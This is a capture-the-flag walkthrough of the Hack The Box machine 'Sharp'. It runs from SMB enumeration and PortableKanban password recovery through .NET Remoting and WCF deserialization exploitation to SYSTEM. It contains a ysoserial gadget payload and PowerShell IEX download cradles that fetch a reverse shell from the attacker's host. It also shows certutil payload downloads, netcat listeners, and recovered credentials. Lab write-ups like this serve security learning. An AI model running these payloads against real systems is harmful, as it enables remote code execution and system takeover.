Hackthebox Sharp walkthrough
Methodology
1- Scanning
2- SMB Enumertion
3- Kanban Analysis
4- Config Manipulation
5- Exploit Remote Service
6- WCF Exploitation
Scanning
┌──(m19o@pwning)-[~/m19o/HTB/sharp]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.219
PORT STATE SERVICE VERSION
135/tcp open tcpwrapped
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8888/tcp open sun-answerbook?
8889/tcp open ddi-tcp-2?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
SMB Enumeration
When you see SMB in Windows enviroment you should go for it !
Let's start enumerating
SMB Enumeration
┌──(m19o@pwning)-[~/m19o/HTB/sharp]
└─# smbmap -H 10.10.10.219
[+] IP: 10.10.10.219:445 Name: localhost
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
dev NO ACCESS
IPC$ NO ACCESS Remote IPC
kanban READ ONLY
It looks like that we can read Kanban directory only, so let's see what we can get
┌──(m19o@pwning)-[~/m19o/HTB/sharp]
└─# smbmap -H 10.10.10.219 -R
[+] IP: 10.10.10.219:445 Name: localhost
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
dev NO ACCESS
IPC$ NO ACCESS Remote IPC
kanban READ ONLY
.\kanban\*
dr--r--r-- 0 Sat Nov 14 13:57:04 2020 .
dr--r--r-- 0 Sat Nov 14 13:57:04 2020 ..
fr--r--r-- 58368 Sat Nov 14 13:57:04 2020 CommandLine.dll
fr--r--r-- 141312 Sat Nov 14 13:57:04 2020 CsvHelper.dll
fr--r--r-- 456704 Sat Nov 14 13:57:04 2020 DotNetZip.dll
dr--r--r-- 0 Sat Nov 14 13:57:59 2020 Files
fr--r--r-- 23040 Sat Nov 14 13:57:04 2020 Itenso.Rtf.Converter.Html.dll
fr--r--r-- 75776 Sat Nov 14 13:57:04 2020 Itenso.Rtf.Interpreter.dll
fr--r--r-- 32768 Sat Nov 14 13:57:04 2020 Itenso.Rtf.Parser.dll
fr--r--r-- 19968 Sat Nov 14 13:57:04 2020 Itenso.Sys.dll
fr--r--r-- 376832 Sat Nov 14 13:57:04 2020 MsgReader.dll
fr--r--r-- 133296 Sat Nov 14 13:57:04 2020 Ookii.Dialogs.dll
fr--r--r-- 2558011 Sat Nov 14 13:57:04 2020 pkb.zip
dr--r--r-- 0 Sat Nov 14 13:57:04 2020 Plugins
fr--r--r-- 5819 Sat Nov 14 13:57:04 2020 PortableKanban.cfg
fr--r--r-- 118184 Sat Nov 14 13:57:04 2020 PortableKanban.Data.dll
fr--r--r-- 1878440 Sat Nov 14 13:57:04 2020 PortableKanban.exe
fr--r--r-- 31144 Sat Nov 14 13:57:04 2020 PortableKanban.Extensions.dll
fr--r--r-- 2080 Sat Nov 14 13:57:04 2020 PortableKanban.pk3
fr--r--r-- 2080 Sat Nov 14 13:57:04 2020 PortableKanban.pk3.bak
fr--r--r-- 34 Sat Nov 14 13:57:04 2020 PortableKanban.pk3.md5
fr--r--r-- 413184 Sat Nov 14 13:57:04 2020 ServiceStack.Common.dll
fr--r--r-- 137216 Sat Nov 14 13:57:04 2020 ServiceStack.Interfaces.dll
fr--r--r-- 292352 Sat Nov 14 13:57:04 2020 ServiceStack.Redis.dll
fr--r--r-- 411648 Sat Nov 14 13:57:04 2020 ServiceStack.Text.dll
fr--r--r-- 1050092 Sat Nov 14 13:57:04 2020 User Guide.pdf
.\kanban\Plugins\*
dr--r--r-- 0 Sat Nov 14 13:57:04 2020 .
dr--r--r-- 0 Sat Nov 14 13:57:04 2020 ..
We need now to get the files on our machine to analyze it to see if we can get any useful information
smbget -R smb://10.10.10.219/kanban
Kanban Analysis
After downloading all the files in Kanban directory, I used ack to search for passwords in the files
apt-get install ack
┌──(m19o@pwning)-[~/m19o/HTB/sharp]
└─# ack -i "password"
PortableKanban.pk3
1:{"Columns":[{"Id":"4757781032fd41b2a4511822e2c08850","SortOrder":0,"Name":"Demo","Limit":0,"TaskOrder":{"SortType":"None","Parameters":[{"Field":"Completed","SortOrder":"Descending"},{"Field":"Deadline","SortOrder":"Ascending"},{"Field":"Priority","SortOrder":"Descending"},{"Field":"Topic","SortOrder":"Ascending"},{"Field":"Person","SortOrder":"Ascending"}]},"AutoComplete":false,"ResetCompleted":false,"TimeStamp":637409769443121006}],"Tasks":[{"Id":"33870d6dfe4146718ba0b2c9f7bc05cf","SeriesId":"00000000000000000000000000000000","SortOrder":"oGdBKcFw","ColumnId":"4757781032fd41b2a4511822e2c08850","TopicId":"00000000000000000000000000000000","PersonId":"00000000000000000000000000000000","Text":"New Task","Priority":"Low","Created":"\/Date(1605380100000+0100)\/","CreatedBy":"e8e29158d70d44b1a1ba4949d52790a0","Modified":"\/Date(-62135596800000)\/","ModifiedBy":"00000000000000000000000000000000","Deadline":"\/Date(1605308400000+0100)\/","HasDeadline":false,"Completed":"\/Date(1605308400000+0100)\/","CompletedBy":"00000000000000000000000000000000","Done":false,"Canceled":false,"Link":"","Subtasks":[],"Tags":[],"Estimate":0,"Progress":0,"Points":0,"Comments":[],"CustomFields":{},"TimeStamp":637409769542424146}],"TimeTracks":[],"Persons":[],"Topics":[],"Tags":[],"Views":[],"Users":[{"Id":"e8e29158d70d44b1a1ba4949d52790a0","Name":"Administrator","Initials":"","Email":"","EncryptedPassword":"k+iUoOvQYG98PuhhRC7/rg==","Role":"Admin","Inactive":false,"TimeStamp":637409769245503731},{"Id":"0628ae1de5234b81ae65c246dd2b4a21","Name":"lars","Initials":"","Email":"","EncryptedPassword":"Ua3LyPFM175GN8D3+tqwLA==","Role":"User","Inactive":false,"TimeStamp":637409769265925613}],"ServiceMessages":[],"CustomFieldDescriptors":[],"MetaData":{"Id":"ffffffffffffffffffffffffffffffff","SchemaVersion":"4.2.0.0","SchemaVersionModified":"\/Date(1605380100000+0100)\/","SchemaVersionModifiedBy":"e8e29158d70d44b1a1ba4949d52790a0","SchemaVersionChecked":"\/Date(-62135596800000-0000)\/","SchemaVersionCheckedBy":"00000000000000000000000000000000","TimeStamp":637409769001918463}}
Ack found creds in PortableKanban.pk3
Administrator
ID: e8e29158d70d44b1a1ba4949d52790a0
Encrypted Password: "k+iUoOvQYG98PuhhRC7/rg=="
Lars
ID: 0628ae1de5234b81ae65c246dd2b4a21
Encrypted Password: "Ua3LyPFM175GN8D3+tqwLA=="
I needed to read Kanban user guide to know how the porgram works
Page 1: The program is portable so we can edit the config but it will be our responsibility if something happened
Page 3: Password can be blank but you shouldn't use it like that
Page 11: Administrator is the default account and the password is blank
Page 18: If your forgot the password take executable file to another directorty and run it as admin
Page 22: Passwords in setup/users tab
After reading the guide, now to need to run the exe file on another directory to restore the passwords
From now you should use windows VM, In my case iam using dual boot so i countinued with windows
When i ran it as admin it says that the files has been successfully recoverd
So i tried to sign in as administrator since it's the default user and that's the only user we know
Config Manipulation
I can't log in, So since it's a portable software let's take a look at the configuration
It's looks like when the application load it takes an encrypted password for the administrator
As i mentioned earlier we can use a blank password, So now let's remove the password and try to log in
BAM ! we logged in
Now let's go to Setup/users tab to get the passwords
You need to uncheck the hide password box to get it
So we got Lars:G123HHrth234gRG
┌──(m19o@pwning)-[~/m19o/HTB/sharp]
└─# smbmap -u lars -p G123HHrth234gRG -H 10.10.10.219
[+] IP: 10.10.10.219:445 Name: localhost
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
dev READ ONLY
IPC$ READ ONLY Remote IPC
kanban NO ACCESS
As you see we have permissions on another 2 directories, Let's list all the files
┌──(m19o@pwning)-[~/m19o/HTB/sharp]
└─# smbmap -u lars -p G123HHrth234gRG -H 10.10.10.219 -R
[+] IP: 10.10.10.219:445 Name: localhost
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
dev READ ONLY
.\dev\*
dr--r--r-- 0 Sun Nov 15 06:30:13 2020 .
dr--r--r-- 0 Sun Nov 15 06:30:13 2020 ..
fr--r--r-- 5632 Sun Nov 15 05:25:01 2020 Client.exe
fr--r--r-- 70 Sun Nov 15 08:59:02 2020 notes.txt
fr--r--r-- 4096 Sun Nov 15 05:25:01 2020 RemotingLibrary.dll
fr--r--r-- 6144 Mon Nov 16 06:55:44 2020 Server.exe
IPC$ READ ONLY Remote IPC
.\IPC$\*
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 lsass
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ntsvcs
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 scerpc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-364-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 epmapper
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-1e4-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 eventlog
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-190-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 atsvc
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 wkssvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-428-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 W32TIME_ALT
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 srvsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 vgauth-service
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-254-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-274-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 PSHost.132546763363573536.2940.DefaultAppDomain.wsmprovhost
kanban NO ACCESS
That's a lot of files, let's get download them on our machine
smbget -R smb://10.10.10.219/dev/ -U lars%G123HHrth234gRG
Exploit Remote Service
We have now to exe files so we need to De-Compile them and analyze them
I used Dnspy https://github.com/dnSpy/dnSpy
So i opened Client.exe
You can see RemoteSample right ?, Let's see what it contains.
It's connecting to port 8888 and there's creds as you can see
User
I searched for .NET remote service exploit and found : ExploitRemotingService
Creating the reverse shell on Windows
1- Download python for windows to start HTTP server to host the reverse shell file
2- Download compiled Nc.exe to get the reverse shell connection
3- Use nishang reverse shell and add this line [Invoke-PowerShellTcp -Reverse -IPAddress [Your IP] -Port [Your listner port]] at the end of the file to download our hosted reverse shell file
4- Download Ysoserial to serialize our payload to bypass windows defender
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c IEX(new-object net.webclient).downloadstring('http://10.10.x.x/Invoke-PowerShellTcp.ps1')"
After serializing
AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAGsvYyBwb3dlcnNoZWxsIC1jIElFWChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vMTAuMTAuMTQuNS9JbnZva2UtUG93ZXJTaGVsbFRjcC5wczEnKQYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMDAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBCgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL
Now we need to use the exploit we found and use the seralized payload
ExploitRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAGsvYyBwb3dlcnNoZWxsIC1jIElFWChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vMTAuMTAuMTQuNS9JbnZva2UtUG93ZXJTaGVsbFRjcC5wczEnKQYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMDAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBCgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL
It will gives you an error ignore it and check your netcat
D:\SEALED\Sharp>nc.exe -lvp 9001
listening on [any] 4321 ...
Windows PowerShell running as user lars on SHARP
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
sharp\lars
PS C:\Windows\system32> net user
User accounts for \\SHARP
-------------------------------------------------------------------------------
Administrator debug DefaultAccount
Guest lars WDAGUtilityAccount
The command completed successfully.
1st flag is collected
PS C:\users\lars\desktop> dir
Directory: C:\users\lars\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/7/2021 2:17 PM 34 user.txt
PS C:\users\lars\desktop> type user.txt
q5e84wq8e4qw8f4dw8f4sdf
After enumerating and that took a lot of time i found dir called WCF and that's a windows service
PS C:\users\lars\documents\wcf> dir
Directory: C:\users\lars\documents\wcf
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/15/2020 1:40 PM .vs
d----- 11/15/2020 1:40 PM Client
d----- 11/15/2020 1:40 PM packages
d----- 11/15/2020 1:40 PM RemotingLibrary
d----- 11/15/2020 1:41 PM Server
-a---- 11/15/2020 12:47 PM 2095 wcf.sln
I compressed it and moved it to dev dir so i can mount it to get the file
PS C:\users\lars\documents> dir
Directory: C:\users\lars\documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/15/2020 1:40 PM wcf
PS C:\users\lars\documents> Compress-Archive -LiteralPath C:\users\lars\Documents\wcf -DestinationPath C:\users\lars\Documents\wcf.zip
PS C:\users\lars\documents> dir
Directory: C:\users\lars\documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/15/2020 1:40 PM wcf
-a---- 1/9/2021 6:09 PM 11598452 wcf.zip
Moving the compressed file
move-item -path C:\users\lars\Documents\wcf.zip -destination c:\dev
Mounting dev dir
C:\Users\Administrator>net use X: \\10.10.10.219\dev
Exploiting WCF
There is an exe file so let's De-compile it with Dnspy like we did before
Let's check what the main function contains
It's connecting to port 8889, WCF is a windows service so it should be running as a privileged user
Now we need to edit the code to get our reverse shell
Console.WriteLine(wcfService.InvokePowerShell("iex (new-object net.webclient).downloadstring('http://10.10.x.x/Invoke-PowerShellTcp.ps1')"));
Now we need to tranfser the exe and the dll library to victim machine to get our reverse shell
PS C:\users\lars\documents> certutil -urlcache -split -f "http://10.10.xx.x/WcfRemotingLibrary.dll" WcfRemotingLibrary.dll
**** Online ****
0000 ...
1e00
CertUtil: -URLCache command completed successfully.
PS C:\users\lars\documents> certutil -urlcache -split -f "http://10.10.xx.x/WcfClient.exe" WcfClient.exe
**** Online ****
0000 ...
1400
CertUtil: -URLCache command completed successfully.
PS C:\users\lars\documents> dir
Directory: C:\users\lars\documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/15/2020 1:40 PM wcf
-a---- 1/9/2021 6:51 PM 5120 WcfClient.exe
-a---- 1/9/2021 6:50 PM 7680 WcfRemotingLibrary.dll
Root
Execute the WCFclient.exe to get the reverse shell
PS C:\users\lars\documents> .\WcfClient.exe
Check your netcat now !
D:\SEALED\Sharp>nc.exe -lvp 4322
listening on [any] 4322 ...
connect to [10.10.xx.xx] from DESKTOP-9LSPC40 [10.10.10.219] 49692
Windows PowerShell running as user SHARP$ on SHARP
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> cd /users/administrator/desktop
PS C:\users\administrator\desktop> dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/7/2021 2:17 PM 34 root.txt
PS C:\users\administrator\desktop> cat root.txt
asda4as49d5as9d59as2d9as2dasds
Thanks for reading i hope you enjoyed.
This post is licensed under CC BY 4.0 by the author.